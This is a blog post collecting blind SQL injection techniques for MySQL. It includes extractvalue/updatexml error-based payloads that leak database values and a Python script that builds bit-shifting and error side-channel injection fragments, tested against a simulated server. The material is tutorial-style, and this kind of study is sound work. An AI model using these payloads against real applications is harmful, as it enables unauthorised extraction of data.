In this quick post I want to collect some cool blind SQLi techniques I recently read about. I will keep this list updated as I find new stuff. For me it is nice to have a list of these techniques online, and a lot of visitors are interested in SQLi as well, so I thought I'd share it 😉 If you don't know what blind SQLi is all about, I recommend starting with this article about basic statistical approaches for efficient data extraction.
You can extract data more efficiently, and thus save requests and time, by using the following techniques:
- extracting data with bit shifting
- extracting data with find_in_set
- extracting data with find_in_set and regexp (also here)
- extracting data through mysql errors
- extracting data through mysql errors (more reliable)
update 24.7.11: I just found out that the neat XML parsing function extractvalue echoes an invalid XPath expression (its second argument) in its error message, so it can be used as a side channel for data extraction or for conditional errors. updatexml behaves the same way:

```sql
SELECT extractvalue(1,concat(0x2e,(SELECT @@version)));
-- ERROR 1105 (HY000): XPATH syntax error: '5.1.36-community-log'

SELECT updatexml(1,concat(0x2e,(SELECT @@version)),1);
-- ERROR 1105 (HY000): XPATH syntax error: '5.1.36-community-log'
```

The 0x2e ('.') prefix is what makes the expression invalid XPath; the rest of the string is printed back verbatim.
(also published here)
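To show what the bit-shifting technique from the list and the extractvalue side channel actually cost in requests, here is an added example that is not part of the original post or of the linked articles. It does not talk to a database: a constructed in-memory value (the @@version string shown above) stands in for the MySQL server, the two `simulated_*_oracle` functions play the role of the injected page, and the payload builders show what the real MySQL fragments look like. The 32-character cap on the XPATH error text is a MySQL limit I assume here, which is why the error path reads 31 characters per request (one is spent on the '.' prefix).

```python
"""Two blind-SQLi extraction strategies, simulated offline.

1. boolean oracle + bit shifting: one request per bit, MSB first
2. extractvalue() error side channel: up to 31 characters per request
"""
import re

# Constructed sample: the value a real attack would pull out of @@version.
SECRET = "5.1.36-community-log"


# --- 1. boolean oracle, bit-shifting extraction ---------------------------

def bitshift_condition(expr: str, pos: int, shift: int, expected: int) -> str:
    """MySQL boolean condition (hypothetical injection point) asking whether the
    byte at 1-based position `pos` of `expr`, shifted right by `shift`, equals
    `expected`. Parentheses keep the precedence of >> and = unambiguous."""
    return f"(ASCII(SUBSTRING(({expr}),{pos},1))>>{shift})={expected}"


def simulated_boolean_oracle(pos: int, shift: int, expected: int) -> bool:
    """Stands in for one request: True when the injected condition held.
    Past the end of the string MySQL's SUBSTRING returns '' and ASCII('') is 0."""
    byte = ord(SECRET[pos - 1]) if pos <= len(SECRET) else 0
    return (byte >> shift) == expected


def extract_bitshift(oracle, max_len: int = 64, bits: int = 7):
    """Recover a string byte by byte. Each bit costs exactly one request: the
    bits above `shift` are already known, so we only test whether the next bit
    is 1; a False answer means it is 0. With bits=7 the high bit is assumed to
    be 0 (plain ASCII); use bits=8 for arbitrary bytes. Stops at a 0 byte."""
    out = []
    requests = 0
    for pos in range(1, max_len + 1):
        known = 0
        for shift in range(bits - 1, -1, -1):
            requests += 1
            if oracle(pos, shift, (known << 1) | 1):
                known = (known << 1) | 1
            else:
                known = known << 1
        if known == 0:
            break
        out.append(chr(known))
    return "".join(out), requests


# --- 2. error side channel via extractvalue() -----------------------------

XPATH_ERROR_LIMIT = 32          # assumed MySQL cap on the echoed XPath text
CHUNK = XPATH_ERROR_LIMIT - 1   # one character goes to the 0x2e ('.') prefix


def extractvalue_payload(expr: str, offset: int) -> str:
    """Fragment that forces the XPATH error and leaks CHUNK bytes of `expr`
    starting at 1-based `offset`."""
    return f"extractvalue(1,concat(0x2e,(SELECT SUBSTRING(({expr}),{offset},{CHUNK}))))"


def simulated_error_oracle(offset: int) -> str:
    """Stands in for the server's error text for extractvalue_payload(offset)."""
    leaked = "." + SECRET[offset - 1: offset - 1 + CHUNK]
    return f"XPATH syntax error: '{leaked[:XPATH_ERROR_LIMIT]}'"


ERROR_RE = re.compile(r"XPATH syntax error: '\.(.*)'")


def extract_via_error(oracle, max_len: int = 1024):
    """Walk the value in CHUNK-sized windows, parsing each error message.
    A short or empty window means the end of the string was reached."""
    out = []
    requests = 0
    offset = 1
    while offset <= max_len:
        requests += 1
        m = ERROR_RE.search(oracle(offset))
        if not m or not m.group(1):
            break
        out.append(m.group(1))
        if len(m.group(1)) < CHUNK:
            break
        offset += CHUNK
    return "".join(out), requests


if __name__ == "__main__":
    print(bitshift_condition("SELECT @@version", 1, 6, 1))
    print(extract_bitshift(simulated_boolean_oracle))   # 147 requests for 20 chars
    print(extractvalue_payload("SELECT @@version", 1))
    print(extract_via_error(simulated_error_oracle))    # 1 request
```

Against the same 20-character value, the boolean route needs 7 requests per character plus 7 to detect the terminating 0 byte, while the error route gets everything back in a single response; when the application shows database errors, the side channel is the one to reach for, and the boolean technique is the fallback for truly blind cases.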
If you know any other clever techniques please leave a comment.